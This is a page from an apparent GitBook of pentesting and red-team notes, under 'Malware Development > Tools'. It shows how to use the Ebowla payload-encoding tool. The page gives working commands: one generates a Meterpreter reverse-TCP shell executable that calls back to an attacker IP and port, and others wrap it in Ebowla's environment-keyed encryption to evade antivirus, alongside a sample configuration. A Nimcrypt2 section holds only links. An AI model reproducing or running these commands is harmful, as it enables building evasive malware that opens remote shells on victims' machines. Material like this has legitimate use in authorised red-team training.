🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • Ebowla
  • Nimcrypt2
  1. Malware Development

Tools

PreviousAMSI BypassNextEsoteric

Last updated 2 years ago

Ebowla

We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe

An example genetic.config,

...
     output_type = GO 
...
        [[ENV_VAR]]
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''

Nimcrypt2

https://github.com/Genetic-Malware/Ebowla
https://github.com/icyguider/Nimcrypt2
https://twitter.com/binitamshah/status/1594698510762332160?s=46&t=LDLfp0MIS1Dsg420TRpKXA